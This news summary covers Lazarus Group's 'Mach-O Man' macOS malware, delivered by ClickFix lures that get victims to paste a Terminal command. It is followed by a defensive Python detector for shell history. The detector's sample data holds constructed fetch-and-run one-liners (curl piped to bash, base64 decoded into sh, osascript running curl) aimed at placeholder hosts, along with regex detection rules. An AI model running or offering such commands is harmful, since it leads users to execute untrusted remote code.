todayonchain.com

Lazarus Group has become especially dangerous with new Mach-O Man attack: CertiK

CoinDesk
Lazarus Group's new Mach-O Man attack uses social engineering to steal credentials and data from crypto firms.

Summary

North Korea's Lazarus Group has launched a new and dangerous attack vector called "Mach-O Man," which exploits routine business calls to gain access to target systems. The modular macOS malware kit, created by Lazarus's Chollima division, is delivered through a social engineering technique known as ClickFix. Attackers send urgent meeting invites that lead victims to fake websites; the site claims there is a connection issue and instructs the victim to paste a command into the Mac's Terminal to "fix" it. Running that command installs the malware and gives the attackers immediate access to corporate systems, SaaS platforms and financial resources. CertiK researcher Natalie Newson points to the group's increased activity and state-directed financial operations, stressing that Lazarus is a constant, well-funded threat to the crypto industry. The malware often erases itself after the breach, which makes detection after the fact difficult.
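Because the malware erases itself, the most reliable place to catch a ClickFix intrusion is the moment the victim pastes and runs the command: shell history and EDR command-line telemetry keep that record even after the payload is gone. The following detector is an added example written for this page, not code from CertiK, CoinDesk or the malware itself. The sample command lines are constructed, the `example.invalid` hosts are placeholders, and the patterns are generic indicators of paste-and-run loaders (download piped to an interpreter, base64 decoded into a shell, osascript wrapping a shell command), not signatures of the actual Mach-O Man command, which the article does not disclose.

```python
import base64
import re

# Constructed sample telemetry (shell history / EDR command lines). These are
# illustrative ClickFix-style one-liners, NOT the real Mach-O Man payload.
_ENCODED_STAGE = base64.b64encode(b"curl -s https://example.invalid/a | bash").decode()
SAMPLE_COMMANDS = [
    "ls -la ~/Downloads",
    "curl -fsSL https://example.invalid/fix | bash",
    f"echo {_ENCODED_STAGE} | base64 -d | sh",
    'bash -c "$(curl -s https://example.invalid/meet)"',
    "osascript -e 'do shell script \"curl -s https://example.invalid/p | sh\"'",
    "git pull origin main",
    "brew install jq",
]

# Building blocks for the rules: common downloaders and interpreters on macOS.
_DL = r"(?:curl|wget)\b"
_SH = r"\b(?:(?:ba|z|da)?sh|python3?|perl|osascript)\b"

# Generic paste-and-run indicators (assumed heuristics, not campaign signatures).
RULES = {
    "download-piped-to-interpreter": re.compile(rf"{_DL}[^|]*\|\s*(?:sudo\s+)?{_SH}"),
    "download-in-command-substitution": re.compile(rf"{_SH}\s+-c\s+[\"']?\$\(\s*{_DL}"),
    "base64-decode-piped-to-interpreter": re.compile(
        rf"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sudo\s+)?{_SH}"
    ),
    "osascript-do-shell-script": re.compile(r"osascript\b.*\bdo shell script\b"),
}

# Runs of base64 alphabet long enough to be an embedded second stage.
_B64_BLOB = re.compile(r"\b[A-Za-z0-9+/]{16,}={0,2}")


def classify(command: str) -> list:
    """Return the rule names a single command line triggers (empty if benign)."""
    hits = [name for name, rx in RULES.items() if rx.search(command)]
    # Second stage: decode embedded base64 blobs and re-scan the plaintext, so an
    # "echo <blob> | base64 -d | sh" loader also reveals what it would have run.
    for blob in _B64_BLOB.findall(command):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 text (e.g. a commit hash); ignore
        hits.extend(f"stage2:{name}" for name, rx in RULES.items() if rx.search(decoded))
    return hits


def scan(commands) -> dict:
    """Map each suspicious command line to the rules it triggered."""
    return {cmd: tags for cmd in commands if (tags := classify(cmd))}


if __name__ == "__main__":
    for cmd, tags in scan(SAMPLE_COMMANDS).items():
        print(f"{', '.join(tags):60s} {cmd}")
```

Feed it `~/.zsh_history` or the process command-line field of your EDR export; the four constructed loader lines are flagged and the three routine commands are not. The second-stage decode matters because the outer `base64 -d | sh` line alone says nothing about what was fetched, while the decoded text exposes the download.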

(Source: CoinDesk)